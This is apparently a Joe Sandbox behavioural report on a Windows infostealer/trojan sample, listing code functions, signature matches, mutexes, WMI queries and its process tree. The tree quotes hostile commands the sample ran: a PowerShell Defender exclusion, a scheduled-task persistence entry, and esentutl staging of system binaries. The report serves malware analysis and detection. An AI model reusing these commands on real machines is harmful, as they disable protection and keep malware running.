                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009EAA439_2_009EAA43
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009E3E809_2_009E3E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009EDF009_2_009EDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009EDF009_2_009EDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062756B89_2_062756B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062766E89_2_062766E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_0627C2A09_2_0627C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_0627B32A9_2_0627B32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062731789_2_06273178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_06277E789_2_06277E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062777989_2_06277798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_0627E4C09_2_0627E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062723509_2_06272350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062700409_2_06270040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_06275DDF9_2_06275DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_062700259_2_06270025
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 10_2_028B85B710_2_028B85B7
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 10_2_028B85C810_2_028B85C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0306B49011_2_0306B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0306B47011_2_0306B470
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08973E9811_2_08973E98
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065BDAAC15_2_065BDAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065B1B9415_2_065B1B94
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065BE60815_2_065BE608
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065B25B815_2_065B25B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065B25A815_2_065B25A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065B417215_2_065B4172
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_065B1D2015_2_065B1D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 15_2_0663336015_2_06633360
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DA20C422_2_02DA20C4
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DAC97722_2_02DAC977
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C941C824_2_00C941C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C9A98824_2_00C9A988
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C9EA8024_2_00C9EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C94A9824_2_00C94A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C93E8024_2_00C93E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C9DE3824_2_00C9DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_00C9DE3824_2_00C9DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_064047CC24_2_064047CC
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06401B4824_2_06401B48
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_064067F124_2_064067F1
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06401F0024_2_06401F00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06405A4124_2_06405A41
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06405AC024_2_06405AC0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06405B0824_2_06405B08
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06417E7824_2_06417E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_064166E824_2_064166E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_064156B824_2_064156B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641C2A024_2_0641C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641236024_2_06412360
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641B33824_2_0641B338
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641779824_2_06417798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641E4C024_2_0641E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_06415DF024_2_06415DF0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641004024_2_06410040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0641002524_2_06410025
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Wisrysxl.PIF 054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02DA46D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02DA4860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02DB894C appears 50 times
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: String function: 02E64500 appears 33 times
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: String function: 02E64860 appears 949 times
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: String function: 02E789D0 appears 45 times
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: String function: 02E7894C appears 56 times
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: String function: 02E644DC appears 74 times
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: String function: 02E646D4 appears 244 times
                      Source: 2jbMIxCFsK.exeBinary or memory string: OriginalFilename vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D99000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022293000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002275000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
                      Source: 2jbMIxCFsK.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@49/26@4/3
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E67FD4 GetDiskFreeSpaceA,0_2_02E67FD4
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E76DC8 CoCreateInstance,0_2_02E76DC8
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b73779169-b
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 2jbMIxCFsK.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeFile read: C:\Users\user\Desktop\2jbMIxCFsK.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_8-188
                      Source: unknownProcess created: C:\Users\user\Desktop\2jbMIxCFsK.exe "C:\Users\user\Desktop\2jbMIxCFsK.exe"
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Windows\SysWOW64\timeout.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Windows\SysWOW64\timeout.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /oJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
